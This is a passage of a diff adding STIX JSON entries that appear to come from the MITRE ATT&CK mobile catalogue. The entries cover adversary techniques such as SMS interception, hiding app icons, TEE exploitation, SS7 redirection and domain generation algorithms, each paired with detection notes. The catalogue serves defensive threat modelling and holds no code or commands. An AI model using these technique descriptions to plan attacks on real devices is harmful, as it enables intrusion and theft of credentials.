"Network Information Discovery", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--e8b4e1ec-8e3b-484c-9038-4459b1ed8060", + "created": "2017-10-25T14:48:15.920Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1412", + "url": "https://attack.mitre.org/techniques/T1412" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "A malicious application could capture sensitive data sent via SMS, including authentication credentials. SMS is frequently used to transmit codes used for multi-factor authentication.\n\nOn Android, a malicious application must request and obtain permission (either at app install time or run time) in order to receive SMS messages. 
Alternatively, a malicious application could attempt to perform an operating system privilege escalation attack to bypass the permission requirement.\n\nOn iOS, applications cannot access SMS messages in normal operation, so an adversary would need to attempt to perform an operating system privilege escalation attack to potentially be able to access SMS messages.", + "modified": "2022-04-01T13:27:29.880Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Capture SMS Messages", + "x_mitre_detection": "On Android, the user can view which applications have permission to access SMS messages through the device settings, and the user can choose to revoke the permission.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:41:56.376Z", + "name": "Endpoint Denial of Service", + "description": "Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users.\n\nOn Android versions prior to 7, apps can abuse Device Administrator access to reset the device lock passcode, preventing the user from unlocking the device. After Android 7, only device or profile owners (e.g. MDMs) can reset the device’s passcode.(Citation: Android resetPassword)\n\nOn iOS devices, this technique does not work because mobile device management servers can only remove the screen lock passcode; they cannot set a new passcode. 
However, on jailbroken devices, malware has been discovered that can lock the user out of the device.(Citation: Xiao-KeyRaider)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, users can review which applications have Device Administrator access in the device settings and revoke permission where appropriate. Application vetting services can detect and closely scrutinize applications that utilize Device Administrator access.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--eb6cf439-1bcb-4d10-bc68-1eed844ed7b3", + "created": "2022-04-06T13:52:05.619Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1642", + "external_id": "T1642" + }, + { + "source_name": "Xiao-KeyRaider", + "description": "Claud Xiao. (2015, August 30). KeyRaider: iOS Malware Steals Over 225,000 Apple Accounts to Create Free App Utopia. Retrieved December 12, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/" + }, + { + "source_name": "Android resetPassword", + "description": "Google. (n.d.). DevicePolicyManager. 
Retrieved October 1, 2019.", + "url": "https://developer.android.com/reference/android/app/admin/DevicePolicyManager.html#resetPassword(java.lang.String,%20int)" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:53:59.025Z", + "name": "Out of Band Data", + "description": "Adversaries may communicate with compromised devices using out of band data streams. This could be done for a variety of reasons, including evading network traffic monitoring, as a backup method of command and control, or for data exfiltration if the device is not connected to any Internet-providing networks (i.e. cellular or Wi-Fi). Several out of band data streams exist, such as SMS messages, NFC, and Bluetooth. \n\n \n\nOn Android, applications can read push notifications to capture content from SMS messages, or other out of band data streams. This requires that the user manually grant notification access to the application via the settings menu. However, the application could launch an Intent to take the user directly there. \n\n \n\nOn iOS, there is no way to programmatically read push notifications. 
", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "If a user sees a notification with text they do not recognize, they should review their list of installed applications.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "created": "2022-04-06T15:27:34.300Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1644", + "external_id": "T1644" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--ed2c05a1-4f81-4d97-9e1b-aff01c34ae84", + "created": "2019-10-01T14:18:47.762Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1521", + "url": "https://attack.mitre.org/techniques/T1521" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. 
Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.", + "modified": "2022-04-05T20:11:35.852Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Encrypted Channel", + "x_mitre_detection": "Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is regarded as undetectable to the user.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--ef771e03-e080-43b4-a619-ac6f84899884", + "created": "2017-10-25T14:48:22.716Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1405", + "url": "https://attack.mitre.org/techniques/T1405" + }, + { + "source_name": "EkbergTEE", + "url": "https://usmile.at/symposium/program/2015/ekberg", + "description": "Jan-Erik Ekberg. (2015, September 10). Android and trusted execution environments. Retrieved December 9, 2016." + }, + { + "source_name": "Thomas-TrustZone", + "url": "https://usmile.at/symposium/program/2015/thomas-holmes", + "description": "Josh Thomas and Charles Holmes. (2015, September). An infestation of dragons: Exploring vulnerabilities in the ARM TrustZone architecture. Retrieved December 9, 2016." 
+ }, + { + "source_name": "QualcommKeyMaster", + "url": "https://bits-please.blogspot.in/2016/06/extracting-qualcomms-keymaster-keys.html", + "description": "laginimaineb. (2016, June). Extracting Qualcomm's KeyMaster Keys - Breaking Android Full Disk Encryption. Retrieved December 9, 2016." + }, + { + "source_name": "laginimaineb-TEE", + "url": "http://bits-please.blogspot.co.il/2016/05/war-of-worlds-hijacking-linux-kernel.html", + "description": "laginimaineb. (2016, May). War of the Worlds - Hijacking the Linux Kernel from QSEE. Retrieved December 21, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-27" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "A malicious app or other attack vector could be used to exploit vulnerabilities in code running within the Trusted Execution Environment (TEE) (Citation: Thomas-TrustZone). The adversary could then obtain privileges held by the TEE potentially including the ability to access cryptographic keys or other sensitive data (Citation: QualcommKeyMaster). Escalated operating system privileges may be first required in order to have the ability to attack the TEE (Citation: EkbergTEE). 
If not, privileges within the TEE can potentially be used to exploit the operating system (Citation: laginimaineb-TEE).", + "modified": "2022-04-06T15:41:57.666Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exploit TEE Vulnerability", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:51:29.931Z", + "name": "Suppress Application Icon", + "description": "A malicious application could suppress its icon from being displayed to the user in the application launcher. This hides the fact that it is installed, and can make it more difficult for the user to uninstall the application. Hiding the application's icon programmatically does not require any special permissions. \n\nThis behavior has been seen in the BankBot/Spy Banker family of malware.(Citation: android-trojan-steals-paypal-2fa)(Citation: sunny-stolen-credentials)(Citation: bankbot-spybanker) \n\nBeginning in Android 10, changes were introduced to inhibit malicious applications’ ability to hide their icon. If an app is a system app, requests no permissions, or does not have a launcher activity, the application’s icon will be fully hidden. Further, if the device is fully managed or the application is in a work profile, the icon will be fully hidden. Otherwise, a synthesized activity is shown, which is a launcher icon that represents the app’s details page in the system settings. 
If the user clicks the synthesized activity in the launcher, they are taken to the application’s details page in the system settings.(Citation: Android 10 Limitations to Hiding App Icons)(Citation: LauncherApps getActivityList)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_contributors": [ + "Emily Ratliff, IBM" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "The user can examine the list of all installed applications, including those with a suppressed icon, in the device settings. If the user is redirected to the device settings when tapping an application’s icon, they should inspect the application to ensure it is genuine. Application vetting services could potentially detect the usage of APIs intended for suppressing the application’s icon.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "created": "2022-03-30T20:06:22.194Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1628/001", + "external_id": "T1628.001" + }, + { + "source_name": "Android 10 Limitations to Hiding App Icons", + "description": "Android. (n.d.). Android 10 Release Notes: Limitations to hiding app icons. Retrieved March 30, 2022.", + "url": "https://source.android.com/setup/start/android-10-release#limitations_to_hiding_app_icons" + }, + { + "source_name": "LauncherApps getActivityList", + "description": "Android. (n.d.). LauncherApps: getActivityList. 
Retrieved March 30, 2022.", + "url": "https://developer.android.com/reference/kotlin/android/content/pm/LauncherApps#getactivitylist" + }, + { + "source_name": "sunny-stolen-credentials", + "description": "Lukáš Štefanko. (2017, February 22). Sunny with a chance of stolen credentials: Malicious weather app found on Google Play. Retrieved July 11, 2019.", + "url": "https://www.welivesecurity.com/2017/02/22/sunny-chance-stolen-credentials-malicious-weather-app-found-google-play/" + }, + { + "source_name": "android-trojan-steals-paypal-2fa", + "description": "Lukáš Štefanko. (2018, December 11). Android Trojan steals money from PayPal accounts even with 2FA on. Retrieved July 11, 2019.", + "url": "https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/" + }, + { + "source_name": "bankbot-spybanker", + "description": "NJCCIC. (2017, March 2). BankBot/Spy Banker. Retrieved July 11, 2019.", + "url": "https://www.cyber.nj.gov/threat-profiles/android-malware-variants/bankbot-spybanker" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--f1c3d071-0c24-483d-aca0-e8b8496ce468", + "created": "2017-10-25T14:48:18.583Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1399", + "url": "https://attack.mitre.org/techniques/T1399" + }, + { + "source_name": "Apple-iOSSecurityGuide", + "url": "https://www.apple.com/business/docs/iOS_Security_Guide.pdf", + "description": "Apple. (2016, May). iOS Security. Retrieved December 21, 2016." 
+ }, + { + "source_name": "Roth-Rootkits", + "url": "https://hackinparis.com/data/slides/2013/Slidesthomasroth.pdf", + "description": "Thomas Roth. (2013). Next generation mobile rootkits. Retrieved December 21, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-27" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device's Trusted Execution Environment (TEE) or other similar isolated execution environment where the code can evade detection, may persist after device resets, and may not be removable by the device user. Running code within the TEE may provide an adversary with the ability to monitor or tamper with overall device behavior.(Citation: Roth-Rootkits)", + "modified": "2022-04-06T15:48:41.647Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Modify Trusted Execution Environment", + "x_mitre_detection": "Devices may perform cryptographic integrity checks of code running within the TEE at boot time.\n\niOS devices will fail to boot if the software running within the Secure Enclave does not pass signature verification.(Citation: Apple-iOSSecurityGuide)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--f296fc9c-2ff5-43ee-941e-6b49c438270a", + "type": "attack-pattern", + "created": "2017-10-25T14:48:23.652Z", + 
"revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1459", + "external_id": "T1459" + } + ], + "modified": "2018-10-17T01:05:10.703Z", + "name": "Device Unlock Code Guessing or Brute Force", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--f58cd69a-e548-478b-9248-8a9af881dc34", + "created": "2017-10-25T14:48:21.667Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1466", + "url": "https://attack.mitre.org/techniques/T1466" + }, + { + "source_name": "NIST-SP800187", + "url": "http://csrc.nist.gov/publications/drafts/800-187/sp800_187_draft.pdf", + "description": "Jeffrey Cichonski, Joshua M Franklin, Michael Bartock. (2017, December). Guide to LTE Security. Retrieved January 20, 2017." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-3.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "CEL-3" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could cause the mobile device to use less secure protocols, for example by jamming frequencies used by newer protocols such as LTE and only allowing older protocols such as GSM to communicate(Citation: NIST-SP800187). 
Use of less secure protocols may make communication easier to eavesdrop upon or manipulate.", + "modified": "2022-04-06T15:50:42.480Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Downgrade to Insecure Protocols", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "network-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--f981d199-2720-467e-9dc9-eea04dbe05cf", + "created": "2017-10-25T14:48:18.937Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1472", + "url": "https://attack.mitre.org/techniques/T1472" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could seek to generate fraudulent advertising revenue from mobile devices, for example by triggering automatic clicks of advertising links without user involvement.", + "modified": "2022-04-06T13:57:49.177Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Generate Fraudulent Advertising Revenue", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": 
"attack-pattern--f9e4f526-ac9d-4df5-8949-833a82a1d2df", + "type": "attack-pattern", + "created": "2017-10-25T14:48:09.446Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1473", + "external_id": "T1473" + } + ], + "modified": "2018-10-17T01:05:10.704Z", + "name": "Malicious or Vulnerable Built-in Device Functionality", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--fa801609-ca8e-415e-815e-65f3826ff4df", + "created": "2022-03-30T19:19:23.777Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1406.001", + "url": "https://attack.mitre.org/techniques/T1406/001" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.", + "modified": "2022-04-21T17:30:16.229Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Steganography", + "x_mitre_detection": "Detection of steganography is difficult unless detectable artifacts with a known signature are left behind by the obfuscation process. 
Look for strings are other signatures left in system artifacts related to decoding steganography.", + "kill_chain_phases": [ + { + "phase_name": "defense-evasion", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--fb3fa94a-3aee-4ab0-b7e7-abdf0a51286d", + "created": "2017-10-25T14:48:06.524Z", + "x_mitre_version": "1.2", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1449", + "url": "https://attack.mitre.org/techniques/T1449" + }, + { + "source_name": "3GPP-Security", + "url": "http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf", + "description": "3GPP. (2000, January). A Guide to 3rd Generation Security. Retrieved December 19, 2016." + }, + { + "source_name": "CSRIC5-WG10-FinalReport", + "url": "https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf", + "description": "Communications Security, Reliability, Interoperability Council (CSRIC). (2017, March). Working Group 10 Legacy Systems Risk Reductions Final Report. Retrieved May 24, 2017." + }, + { + "source_name": "TheRegister-SS7", + "url": "https://www.theregister.co.uk/2017/05/03/hackers_fire_up_ss7_flaw/", + "description": "Iain Thomson. (2017, May 3). After years of warnings, mobile network hackers exploit SS7 flaws to drain bank accounts. Retrieved November 8, 2018." + }, + { + "source_name": "Positive-SS7", + "url": "https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf", + "description": "Positive Technologies. (n.d.). SS7 Attack Discovery. Retrieved December 19, 2016." 
+ }, + { + "source_name": "Engel-SS7-2008", + "url": "https://www.youtube.com/watch?v=q0n5ySqbfdI", + "description": "Tobias Engel. (2008, December). Locating Mobile Phones using SS7. Retrieved December 19, 2016." + }, + { + "source_name": "Engel-SS7", + "url": "https://berlin.ccc.de/~tobias/31c3-ss7-locate-track-manipulate.pdf", + "description": "Tobias Engel. (2014, December). SS7: Locate. Track. Manipulate.. Retrieved December 19, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-37.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "CEL-37" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "An adversary could exploit signaling system vulnerabilities to redirect calls or text messages (SMS) to a phone number under the attacker's control. The adversary could then act as an adversary-in-the-middle to intercept or manipulate the communication. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport) Interception of SMS messages could enable adversaries to obtain authentication codes used for multi-factor authentication(Citation: TheRegister-SS7).", + "modified": "2022-04-06T15:53:27.032Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exploit SS7 to Redirect Phone Calls/SMS", + "x_mitre_detection": "Network carriers may be able to use firewalls, Intrusion Detection Systems (IDS), or Intrusion Prevention Systems (IPS) to detect and/or block SS7 exploitation as described by the Communications, Security, Reliability, and Interoperability Council (CSRIC). 
(Citation: CSRIC5-WG10-FinalReport) The CSRIC also suggests threat information sharing between telecommunications industry members.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "network-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:59:57.485Z", + "name": "Hide Artifacts", + "description": "Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Mobile operating systems have features and developer APIs to hide various artifacts, such as an application’s launcher icon. These APIs have legitimate usages, such as hiding an icon to avoid application drawer clutter when an application does not have a usable interface. Adversaries may abuse these features and APIs to hide artifacts from the user to evade detection.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "The user can examine the list of all installed applications in the device settings. 
Application vetting services could potentially detect the usage of APIs intended for artifact hiding.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--fc53309d-ebd5-4573-9242-57024ebdad4f", + "created": "2022-03-30T20:00:12.654Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1628", + "external_id": "T1628" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-16T18:37:55.822Z", + "name": "Code Signing Policy Modification", + "description": "Adversaries may modify code signing policies to enable execution of applications signed with unofficial or unknown keys. Code signing provides a level of authenticity on an app from a developer, guaranteeing that the program has not been tampered with and comes from an official source. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on a device. \n\nMobile devices generally enable these security controls by default, such as preventing the installation of unknown applications on Android. 
Adversaries may modify these policies in a number of ways, including [Input Injection](https://attack.mitre.org/techniques/T1516) or malicious configuration profiles.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, the user can use the device settings menu to view trusted CA certificates and look for unexpected or unknown certificates. A mobile security product could similarly examine the trusted CA certificate store for anomalies. Users can use the device settings menu to view which applications on the device are allowed to install unknown applications.\n\nOn iOS, the user can use the device settings menu to view installed Configuration Profiles and look for unexpected or unknown profiles. A Mobile Device Management (MDM) system could use the iOS MDM APIs to examine the list of installed Configuration Profiles for anomalies.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "created": "2022-03-30T18:13:26.003Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1632/001", + "external_id": "T1632.001" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-7.html", + "external_id": "STA-7" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ 
+ "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--fd211238-f767-4599-8c0d-9dca36624626", + "created": "2022-04-05T19:59:03.161Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1637.001", + "url": "https://attack.mitre.org/techniques/T1637/001" + }, + { + "source_name": "Data Driven Security DGA", + "url": "https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/", + "description": "Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019." + }, + { + "source_name": "securelist rotexy 2018", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may use [Domain Generation Algorithms](https://attack.mitre.org/techniques/T1637/001) (DGAs) to procedurally generate domain names for uses such as command and control communication or malicious application distribution.(Citation: securelist rotexy 2018)\n\nDGAs increase the difficulty for defenders to block, track, or take over the command and control channel, as there could potentially be thousands of domains that malware can check for instructions.", + "modified": "2022-04-05T19:59:22.888Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Domain Generation Algorithms", + "x_mitre_detection": "Detecting dynamically 